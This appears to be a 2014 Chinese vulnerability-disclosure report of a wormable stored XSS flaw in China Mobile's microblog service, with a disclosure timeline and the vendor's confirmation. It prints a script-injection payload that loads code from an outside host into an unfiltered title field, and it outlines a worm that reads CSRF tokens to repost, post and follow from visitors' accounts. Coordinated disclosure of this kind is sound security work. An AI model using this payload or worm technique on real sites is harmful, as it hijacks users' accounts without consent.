漏洞概要
关注数(24)
关注此漏洞
漏洞标题:中国移动微博存储型XSS 可蠕虫(附蠕虫POC)
提交时间:2014-12-26 20:16
修复时间:2015-02-09 20:18
公开时间:2015-02-09 20:18
漏洞类型:xss跨站脚本攻击
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
Tags标签:
无
漏洞详情
披露状态:
2014-12-26: 细节已通知厂商并且等待厂商处理中
2014-12-30: 厂商已经确认,细节仅向厂商公开
2015-01-09: 细节向核心白帽子及相关领域专家公开
2015-01-19: 细节向普通白帽子公开
2015-01-29: 细节向实习白帽子公开
2015-02-09: 细节向公众公开
简要描述:
1.转发微博
2.发表新微博
3.收听我
详细说明:
问题出在中国移动微博的发表长微博处。
在标题处未作任何过滤,可插入30字符的代码。
<script/src=//km3.pw></script>
存在问题的页面:http://weibo.10086.cn/cwb/article.php?id=10404
只要登陆了中国移动微博号 打开这个页面,便会转发我的微博 并发表一条新微博 并收听我。
POC:
发表微博 转发 收听等都需要一个csrftoken值,而这个值就在/weibo.php中,可以非常轻易的获取到。
效果如下:
http://km3.pw/10086women.mp4 请看视频
漏洞证明:
问题出在中国移动微博的发表长微博处。
在标题处未作任何过滤,可插入30字符的代码。
<script/src=//km3.pw></script>
存在问题的页面:http://weibo.10086.cn/cwb/article.php?id=10404
只要登陆了中国移动微博号 打开这个页面,便会转发我的微博 并发表一条新微博 并收听我。
POC:
发表微博 转发 收听等都需要一个csrftoken值,而这个值就在/weibo.php中,可以非常轻易的获取到。
效果如下:
http://km3.pw/10086women.mp4 请看视频
修复方案:
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2014-12-30 15:02
厂商回复:
CNVD确认所述情况,已经转由CNCERT向中国移动通报。
最新状态:
暂无
漏洞评价:
评论
-
2014-12-26 20:49 |
px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)
-
2014-12-26 21:57 |
机器猫 ( 普通白帽子 | Rank:1141 漏洞数:253 | 爱生活、爱腾讯、爱网络!)
http://weibo.10086.cn/ 你说的是这个?